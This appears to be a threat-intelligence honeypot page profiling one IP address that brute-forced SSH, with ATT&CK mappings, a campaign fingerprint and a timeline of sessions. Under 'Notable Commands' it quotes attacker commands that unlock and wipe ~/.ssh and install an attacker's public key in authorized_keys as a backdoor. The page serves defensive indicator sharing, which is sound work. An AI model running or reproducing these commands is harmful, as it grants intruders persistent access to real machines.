IntrusionLabs IntrusionLabs
← Back to feed

20.228.193.165

Threat Confidence
58%
Location
🇺🇸 US / Washington
ASN
AS8075 · Microsoft Corporation
Cloud Provider
Microsoft Azure
Total Events
287
Top 10% by volume
Agent Count
1
First / Last Seen
2026-04-20 20:05 — 2026-04-20 20:47
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Reconnaissance
T1595.002
Initial Access
T1078
Defense Evasion
T1070.004
Credential Access
T1110 T1110.001
Command and Control
T1105
External Corroboration
Blocklist.de
Reported 2026-04-20 22:49
blocklist_de:reported
Campaigns
HASSH 03a80b21afa8… — SSH-2.0-libssh_0.11.1 (666 IPs, 73 countries) HASSH Active high 🇨🇳 CN
666 IPs 249426 events
ssh:bruteforce
2026-02-27 — ongoing · 666 IPs are running an identical SSH client (HASSH fingerprint 03a80b21afa8…). Top network: China Telecom Group (AS4811). Geographic …
Session Forensics
malware_dropper ×9 credential_probe ×25 opportunistic_bruter ×9
Sessions
43 (18 with login)
Avg Depth Score
0.43
Commands Executed
27
Files Downloaded
9
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Fingerprints
HASSH
03a80b21afa810682a776a7d42e5e6fb
SSH Client
SSH-2.0-libssh_0.11.1
Evidence Timeline
Opportunistic Bruter f4ed3eb57da9 w4m_singapore_01 · 2026-04-20 20:47
1 50%
Loading events...
Malware Dropper 4717b806b9e1 w4m_singapore_01 · 2026-04-20 20:47
3 1 1 100%
Loading events...
Credential Probe 9b6824cbb955 w4m_singapore_01 · 2026-04-20 20:47
1 20%
Loading events...
Credential Probe 677afb40e775 w4m_singapore_01 · 2026-04-20 20:45
1 20%
Loading events...
Malware Dropper cd2701761fbf w4m_singapore_01 · 2026-04-20 20:44
3 1 1 100%
Loading events...
Opportunistic Bruter 5ffc9df00363 w4m_singapore_01 · 2026-04-20 20:44
1 50%
Loading events...
Credential Probe 6439ed27176c w4m_singapore_01 · 2026-04-20 20:44
1 20%
Loading events...
Credential Probe 01dff75ed3a6 w4m_singapore_01 · 2026-04-20 20:42
1 20%
Loading events...
Credential Probe ac3b34ff9454 w4m_singapore_01 · 2026-04-20 20:40
1 20%
Loading events...
Credential Probe 425e0befdd20 w4m_singapore_01 · 2026-04-20 20:39
1 20%
Loading events...
Malware Dropper 491c37042868 w4m_singapore_01 · 2026-04-20 20:37
3 1 1 100%
Loading events...
Opportunistic Bruter 7b2e85863ced w4m_singapore_01 · 2026-04-20 20:37
1 50%
Loading events...
Credential Probe 5cba3a371c14 w4m_singapore_01 · 2026-04-20 20:37
1 20%
Loading events...
Credential Probe 12fd2f671464 w4m_singapore_01 · 2026-04-20 20:35
1 20%
Loading events...
Opportunistic Bruter 9dd312ee8639 w4m_singapore_01 · 2026-04-20 20:34
1 50%
Loading events...
Malware Dropper 596de2b0b8ca w4m_singapore_01 · 2026-04-20 20:34
3 1 1 100%
Loading events...
Credential Probe b076c86e766a w4m_singapore_01 · 2026-04-20 20:34
1 20%
Loading events...
Credential Probe 7764f27d3c7d w4m_singapore_01 · 2026-04-20 20:32
1 20%
Loading events...
Credential Probe 739eba83db7b w4m_singapore_01 · 2026-04-20 20:30
1 20%
Loading events...
Credential Probe a1f9dd3691ef w4m_singapore_01 · 2026-04-20 20:29
1 20%
Loading events...
Credential Probe bf7f91ccb5e3 w4m_singapore_01 · 2026-04-20 20:27
1 20%
Loading events...
Credential Probe 45efd7c0e5fb w4m_singapore_01 · 2026-04-20 20:25
1 20%
Loading events...
Opportunistic Bruter 45858cf0b692 w4m_singapore_01 · 2026-04-20 20:24
1 50%
Loading events...
Malware Dropper fac814a949c5 w4m_singapore_01 · 2026-04-20 20:24
3 1 1 100%
Loading events...
Credential Probe dc675d6d6f0b w4m_singapore_01 · 2026-04-20 20:24
1 20%
Loading events...
Credential Probe 17bb1d5d3e8a w4m_singapore_01 · 2026-04-20 20:22
1 20%
Loading events...
Credential Probe 128cd4bd7f87 w4m_singapore_01 · 2026-04-20 20:21
1 20%
Loading events...
Credential Probe 064a5b1de852 w4m_singapore_01 · 2026-04-20 20:19
1 20%
Loading events...
Malware Dropper 519611666e4f w4m_singapore_01 · 2026-04-20 20:17
3 1 1 100%
Loading events...
Opportunistic Bruter 53d7e23f9b2d w4m_singapore_01 · 2026-04-20 20:17
1 50%
Loading events...
Credential Probe 661036a5ac9d w4m_singapore_01 · 2026-04-20 20:17
1 20%
Loading events...
Credential Probe 9437a1ca02a1 w4m_singapore_01 · 2026-04-20 20:16
1 20%
Loading events...
Malware Dropper 5fe88f9aba82 w4m_singapore_01 · 2026-04-20 20:14
3 1 1 100%
Loading events...
Opportunistic Bruter 6cd6fcd32793 w4m_singapore_01 · 2026-04-20 20:14
1 50%
Loading events...
Credential Probe 50fcbd5310e6 w4m_singapore_01 · 2026-04-20 20:14
1 20%
Loading events...
Credential Probe 7a73ffbcfd48 w4m_singapore_01 · 2026-04-20 20:12
1 20%
Loading events...
Opportunistic Bruter 12596005180e w4m_singapore_01 · 2026-04-20 20:11
1 50%
Loading events...
Malware Dropper 6b5279ab80a2 w4m_singapore_01 · 2026-04-20 20:11
3 1 1 100%
Loading events...
Credential Probe 592b1c155b83 w4m_singapore_01 · 2026-04-20 20:11
1 20%
Loading events...
Opportunistic Bruter 85a1734db8c7 w4m_singapore_01 · 2026-04-20 20:10
1 50%
Loading events...
Malware Dropper f6e922bc4a97 w4m_singapore_01 · 2026-04-20 20:09
3 1 1 100%
Loading events...
Credential Probe 85b4ac312af2 w4m_singapore_01 · 2026-04-20 20:10
1 20%
Loading events...
Credential Probe 86a28ce94358 w4m_singapore_01 · 2026-04-20 20:05
1 20%
Loading events...